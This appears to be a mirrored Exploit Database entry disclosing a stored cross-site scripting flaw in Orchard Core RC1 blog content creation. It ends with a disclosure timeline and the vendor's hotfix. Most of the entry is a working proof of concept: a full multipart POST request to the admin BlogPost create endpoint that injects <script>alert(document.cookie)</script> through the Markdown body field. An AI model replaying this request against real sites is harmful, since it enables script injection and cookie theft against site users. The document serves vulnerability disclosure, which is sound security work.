Orchard Core RC1 – Persistent Cross-Site Scripting

• Exploit Database
• 121 阅读

• 作者： SunCSR
  日期： 2020-05-12
• 类别：

  • webapps
  平台：

  • aspx
• 来源：https://www.exploit-db.com/exploits/48456/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  # Exploit Title: Orchard Core RC1 - Persistent Cross-Site Scripting # Google Dork: "Orchardcms" # Date: 2020-05-07 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: http://www.orchardcore.net/ # Software Link: https://github.com/OrchardCMS/OrchardCore # Version: RC1 # Tested on: Windows # CVE : N/A   ### Vulnerability : Persistent Cross-Site Scripting   ###Describe the bug Persistent Cross-site scripting (Stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML via create or edit blog content.   ###To Reproduce Steps to reproduce the behavior: POST /Admin/Contents/ContentTypes/BlogPost/Create HTTP/1.1 -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="ListPart.ContainerId"   4s5x3fv3qpsh7rwzvy069ykbxn -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="TitlePart.Title"   Test XSS -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="AutoroutePart.Path"     -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="BlogPost.Subtitle.Text"     -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="MarkdownBodyPart.Source"   <script>alert(document.cookie)</script> -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="submit.Publish"   submit.Publish -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="__RequestVerificationToken"   xxx -----------------------------31063090348194141451329743365--   ###Reference: https://github.com/OrchardCMS/OrchardCore/issues/5802   ### History ============= 2020-03-23Issue discovered 2020-03-27Vendor contacted 2020-04-22Vendor response and hotfix 2020-04-22Vendor set patch milestone to rc2